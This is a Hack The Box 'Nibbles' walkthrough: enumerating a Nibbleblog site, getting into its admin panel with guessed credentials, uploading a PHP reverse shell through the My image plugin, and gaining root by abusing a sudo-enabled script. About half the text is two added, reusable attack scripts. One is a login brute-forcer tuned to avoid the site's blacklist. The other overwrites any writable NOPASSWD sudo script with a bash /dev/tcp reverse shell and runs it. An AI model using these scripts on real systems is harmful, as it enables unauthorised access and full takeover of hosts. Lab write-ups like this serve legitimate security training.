Browsing to http://10.10.10.75/ brings us to a page simply saying Hello World!, but the page source points us to http://10.10.10.75/nibbleblog, where we find a site running a product named Nibbleblog.

Let's dig a little deeper into this site with a gobuster scan. Two of the hits are worth a closer look: nibbleblog/README is a great place to find versioning information, and nibbleblog/admin.php will generally give us a chance to attack an admin login page. Starting with nibbleblog/README, the version information is right at the top of the file. Next is nibbleblog/admin.php, where, as expected, we find a login page.

After a quick google didn't bring up a set of default credentials, I'll use hydra to brute force the login with the username admin. To see what's really going on with this form, we start up our Burp Suite proxy and submit a test login attempt to see how the data is being sent, so we can hand the same request format to hydra. Nibbleblog blacklists our address after too many failed logins, so the hydra run locks us out before it finishes; the credentials admin:nibbles get us into the admin panel instead. Just to satisfy my own curiosity, I verified that the password nibbles would in fact have been found by my hydra scan if we weren't blacklisted :).
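As an added example (not code from the original write-up), here is the password-guessing loop written so that it notices the blacklist and stops, which hydra will not do on its own. The form field names, the "Incorrect" and "blacklist" response strings, and the 3xx-on-success behaviour are assumptions rather than details taken from the page; post_login is the only function that touches the network, so the rest of the logic can be exercised against a fake.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: a throttled password guess
# against the Nibbleblog admin login that stops as soon as the application
# blacklists us. hydra keeps hammering after the blacklist kicks in, which is
# how the write-up's run got locked out.
# Assumptions (not shown on the page): the form posts "username" and
# "password" fields to admin.php, a rejected login contains the word
# "Incorrect", a blacklisted client sees the word "blacklist", and a
# successful login answers with a 3xx redirect.
TARGET="${TARGET:-http://10.10.10.75/nibbleblog/admin.php}"

# One login attempt; prints the raw HTTP response (status line, headers, body).
# Kept separate so it can be replaced by a fake server when testing the logic.
post_login() {  # $1 = username, $2 = password
    curl -s -i --data-urlencode "username=$1" --data-urlencode "password=$2" "$TARGET"
}

# Reads a raw response on stdin and prints one word: success, failed,
# blacklisted, or unknown.
classify_response() {
    resp="$(cat)"
    if printf '%s\n' "$resp" | grep -qi 'blacklist'; then
        echo blacklisted
    elif printf '%s\n' "$resp" | grep -qi 'incorrect'; then
        echo failed
    elif printf '%s\n' "$resp" | head -n 1 | grep -q ' 30[0-9] '; then
        echo success
    else
        echo unknown
    fi
}

# Tries every password in $2 for user $1 with $3 seconds between attempts.
# Prints "user:password" on success. Returns 0 on success, 1 if the list is
# exhausted, 2 as soon as the target blacklists us (keep hammering and you
# only extend the ban).
brute_force() {  # $1 = username, $2 = wordlist file, $3 = delay in seconds
    user="$1"; wordlist="$2"; delay="${3:-1}"
    while IFS= read -r pw || [ -n "$pw" ]; do
        result="$(post_login "$user" "$pw" | classify_response)"
        case "$result" in
            success)
                echo "$user:$pw"
                return 0 ;;
            blacklisted)
                echo "blacklisted while trying '$pw'; stop and wait it out" >&2
                return 2 ;;
        esac
        sleep "$delay"
    done < "$wordlist"
    return 1
}
```

Usage against the real target is brute_force admin /path/to/wordlist 2; the delay is what keeps you under the blacklist threshold, and the exit code 2 is the signal to stop rather than extend the ban.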
Once logged in, we can abuse the My image plugin to upload a php file and then execute it at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php. Instead of using metasploit for this, I prefer to exploit it on my own. First we'll need a reverse shell to upload, and we'll use msfvenom to generate the payload. tunip is a handy bash alias I use to get my current IP address for Hack The Box; it is defined in my ~/.bash_aliases as alias tunip="ifconfig tun0 | sed -n '2 p' | awk '{print \$2}'" (the backslash keeps $2 from being expanded when the alias is defined).
With the payload generated, we upload it through the My image plugin and click Save Changes. You'll get some error messages, but this isn't a problem. Navigating to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php triggers our reverse shell on port 31337. With this we are able to get the user flag.

Looking around in nibbler's home directory gives us a personal.zip file. Using unzip we can decompress this file and discover a file personal/stuff/monitor.sh, which looks to be a custom monitoring script. Following my usual steps, I then run sudo -l to see if we have passwordless sudo access to anything, and sure enough, nibbler can run /home/nibbler/personal/stuff/monitor.sh as root through sudo without supplying a password. Since the script lives in nibbler's own home directory and we can write to it, whatever we put in it runs as root. To exploit this I'm simply going to overwrite that file with a bash reverse shell back to my Kali host on a different port and run it through sudo. This replaces monitor.sh with a reverse shell, then executes that reverse shell with root privileges. With this we are able to read the root flag.
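The privilege escalation as an added script (not the author's command, which the page does not show): parse sudo -l for NOPASSWD entries, check that the listed script is writable by us, overwrite it with a bash reverse shell, and run it through sudo. The sudo -l line format is the standard sudoers listing; LHOST and LPORT are placeholders for your Kali host and the second listener port.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: the monitor.sh privilege
# escalation as a script. It parses `sudo -l` output for NOPASSWD entries,
# checks that the listed script is writable by us, overwrites it with a bash
# reverse shell, and runs it through sudo so the shell comes back as root.
# Assumptions: the NOPASSWD lines look like the standard `sudo -l` listing
# ("    (root) NOPASSWD: /path/to/script"), and a listener is already waiting
# on LHOST:LPORT.

# Prints the path of each command we can run with sudo and no password,
# reading `sudo -l` output from stdin (one entry per line).
nopasswd_commands() {
    sed -n 's/^[[:space:]]*(.*)[[:space:]]*NOPASSWD:[[:space:]]*//p' \
        | tr ',' '\n' \
        | sed 's/^[[:space:]]*//;s/[[:space:]]*$//'
}

# Writes a bash reverse shell to $1 that connects back to $2:$3 and makes it
# executable. Refuses to proceed if the file exists but is not writable: the
# whole trick depends on us controlling the script sudo is going to run.
plant_reverse_shell() {  # $1 = target script, $2 = LHOST, $3 = LPORT
    target="$1"; lhost="$2"; lport="$3"
    if [ -e "$target" ] && [ ! -w "$target" ]; then
        echo "$target is not writable" >&2
        return 1
    fi
    printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" > "$target"
    chmod +x "$target"
}

# Full chain: take the first NOPASSWD shell script, plant the payload, and
# run it via sudo. The shell that connects back is root's.
escalate() {  # $1 = LHOST, $2 = LPORT
    script="$(sudo -n -l 2>/dev/null | nopasswd_commands | grep '\.sh$' | head -n 1)"
    [ -n "$script" ] || { echo "no NOPASSWD script found" >&2; return 1; }
    plant_reverse_shell "$script" "$1" "$2" || return 1
    sudo "$script"
}
```

Start the second listener (nc -lvnp on the chosen port) before calling escalate; the original monitor.sh is overwritten, so copy it aside first if the box is shared.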